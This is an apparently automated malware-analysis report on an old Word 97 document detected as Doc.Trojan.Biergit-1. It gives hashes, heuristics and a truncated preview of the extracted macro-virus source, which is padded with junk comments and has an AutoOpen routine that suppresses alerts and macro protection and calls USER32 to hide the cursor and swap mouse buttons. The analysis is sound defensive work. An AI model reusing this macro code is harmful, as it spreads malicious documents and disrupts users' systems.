Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09bb6a84970cd89a…

MALICIOUS

Office (OLE)

80.0 KB Created: 2001-01-29 22:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2383e4d4f9c145110b821fad3959a785 SHA-1: ca8430408c1ae2981dfdfdad0e32d2a968512fdf SHA-256: 09bb6a84970cd89a1b70a9531566b14639fd00bbb5f132bede6f6c32e81be223
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Biergit-1. Static analysis detected a legacy WordBasic AutoOpen macro, a common indicator of malicious documents. The embedded URL, while not directly used by the macro in the provided snippet, suggests a potential command and control or payload delivery vector.

Heuristics 5

  • ClamAV: Doc.Trojan.Biergit-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Biergit-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.moritzlangner.de In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49358 bytes
SHA-256: 0b50cb9536bcd15b6e52a43cc19951cde5403a28abd3cc9ace72f0dd416e23ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Kz876"
    Rem AWUDJUOKVRDJIICWYQYJPEWARFHKXSJWTTTDQHWY
    Rem A
    Rem HBEZMWXMVHOCUOT
    Rem EQZIGWDOPPS
    Rem ZYGHFITZUZAZSVXHFGCJIDYRYZNTSVRJQ
    Rem TMQFSXAHUVURBFSCHFTFQKSTYARXSH

    Rem KHZUSKTHJLYDQJCECL
    Rem GYSRARMXFTNAHMPFVCOEQUJJNZHGBXICPE
    Rem AGDOVOFMUREWZK
    Rem QTSRGHNKANITQPLOFHMHMJWMFQCCUVRF
    Rem QSGKRHYFQDELLPKBEEWOIBJWEJENFHFZERQI
    Rem NNVEUQENYRPZUBDKJZOVMRM
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
    Rem RRKGJCRDSDPTJCGJ
    Rem XGMWLZFWCJLQYXXEWRCHNQSHHKJQRKMITYODGWR
    Rem SAHUPNOZDXNVURMOZGOESMUYJCPXSLL
    Rem KKHHQKQIQJAVOOTUEGNKY
    Rem VJCV
    Rem JQMJBAICLIHB
    Rem GXGVGTJSYVDXKVCCPAOFFHHEWBFDIVMY
    Rem UNVABFETVFLGIXJEZYNCITPMGXQA
    Rem UBYDCBFVYZFLG
    Rem EFNTJLVHUJMFJTGGOJ
    Rem XLRNNMJKHBGZBKJMEMGQOE
    Rem KHZUSKTHJLYDQJCECL
Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long
    Rem XLRNNMJKHBGZBKJMEMGQOE
    Rem FZXHYYWJFXZGYVWPGIMUYSJKKOFURQLYUSGTHZQF
    Rem JDNSVNMRLDHPHGFENRZGKVEVOIEOHLEU
    Rem HUKRHMIHXOPGRKUSPDMJT
    Rem FCPZBCKRUODJKYNP
    Rem SWRJGGXWMMPPUHILNIMH
    Rem WNCPFCTTVNFIGZSJSBJABFOUFRJVXOLVIAYYPAVU
    Rem FFALGPLPUFFYDLZJ
    Rem WDIDBZHNFFBEPYF
    Rem CMQKSOYFNUEPZNWHZRJENRVUXEKUXNPWG
    Rem EHULFIPTOUWIYK
    Rem ZARYDJMXEVQFBXMRBAYFXLEHTWGJWWKPEY

    Rem CBOYFJX
    Rem QLOLEZZHJHRNWNA
    Rem NULZDRSTMZWERHWTKCQCRICQ
    Rem LMFEVKKFFYYBHAEK
    Rem NRJQEXJVEMATVHKNARZCUBZZR
    Rem DXDPAVXFXKUSXZNMDDXHDYCXVQEOKEQZYMNLRL
    Rem RWKU
    Rem QVQYZIMMMAMVRVCVGM
    Rem YEYOVQMNEYQCWUOJGOYBPMJNJQODGJPOOYTTBK
Sub AutoOpen()
    Rem XKWUXWGQNUMJSNOMJSPSZIWXN

    Rem IXWFCJTYQMGG
    Rem VYQZLJQEJGJB
    Rem MHIKRKXE
    Rem XTUZYEHSJGAUPMYLUWKPYUJLGLUJMCCXU
    Rem FYYSXAUMYSFUNAMUKYOHWRYT
    Rem MLJBZPHMIVSWFCMDEMVRUBFPZUEPRYNNK
    Rem ZZPGKGRQNEBFXYQHNWONBQFSAIUNHVTNVRVQWYD
    Rem SGPILZZQNDJYEPJLPVHWCJVWEX
    Rem IZNNFYHTIOVECCSDLLPUTDISAKHSRW
    ' Word97 Macro Virii Creation Kit
    Rem R
    Rem HAYEBRCIUASRIRBFJBRCVORTC
    Rem RXDXRUGQPBMUPXVRPBDQNFTRZJAVUNG
    ' ===============================
    ' Code by Jack Twoflower/LzØ Vx
    ' ===============================
    Rem NANFCF
    Rem RVAOPSNTDHSORAVSDWJVWYTALDXWFCGMXS
    Rem RFQXLDNREGREHGSWRPGUVAWMBIXULQYGMLBIGN
    Rem UPDILHNAVSTEFESLXUUNDAOBFBG
    Rem DEAEFMRSMISZMEUEEQFVMCSVJESQ
    Rem LMGFOGTNMGOWLQU
    Rem FNDITWQRPXEJVKIGGZYMUDN
    Rem X
    Rem DGCLJQVOZZOLPQFWJOADVLUMBGAHJ
    ' W97M.°°AFFENWALD°°

On Error Resume Next
    Rem GJWNWDYGBTSNAVCYHPCDJWFFBAD
    Rem EPRCQTULCMOBKDDIZPHKMBLLYHENINKGBQJOWKP
    Rem OR
    Rem LFSIVCARBPBZCGLGEKXDDYEDXNCQAUWSRJTNZGUU
    Rem KUVEG
    Rem BSOKBWQVXDXYZVBANKJLHCNREDJEQY
    Rem LADLZQRRUSBWNVWFIHMRDOTXRCRUL
WordBasic.DisableAutoMacros 0
    Rem SHRYBMOHPLCPUQKE
    Rem OQQBZFPNYQUUUHJMQMWEHICHO
    Rem HYNX
ActiveDocument.ReadOnlyRecommended = False
    Rem DHWRMOGAGYBWCSGXBPMWLVV
    Rem IPDAVCRNKRMTZKDOHFOUKBWRODGEMLIWOUT
    Rem YMZLTSFERZUOJHTGSP
With Application
    Rem UILFCZ
    Rem JIKJDFQDROBAVQFPFPFWPUVYAAYKQ
.EnableCancelKey = wdCancelDisabled
    Rem STNQIVPMTCLJGGDWZKUAUTBOALRRD
    Rem PZCFVAHAPGESOHHXTUALLI
    Rem YWLSDUTBOCCFRMFMJWSCHHFUZVVIPZTLOCOY
.DisplayAlerts = wdAlertsNone
    Rem G
    Rem IVQ
    Rem HMWOAACMOXNIQRFPJJWMHGOMFYIACQ
    Rem VRBMCRULANPWIHPJOQRDRYUYDHSGYYWXEYCUSYL
    Rem MALHTXVECADJEZWPSDGAVUUILOUOFFJOINLOBOFZ
.ScreenUpdating = False
    Rem DSVRLIQLOVSUGCFSPWRBMPQWEMIAHVSGVNQLSD
    Rem CPEYCLHWTHRGCA
    Rem ERJMNJJKGALMECTBNACYFIOQXTUWCFTAOFY
    Rem UZYJLWEGGCSKSEKPNRJXRLIELRNFPRNSDG
    Rem XSHUDGIY
    Rem LUTJWOM
    Rem RDXKECXGNNEUZBCVUIQE
    Rem CPEYCLHWTHRGCA
    Rem EWQNFDRZKECHZDGZQ
... (truncated)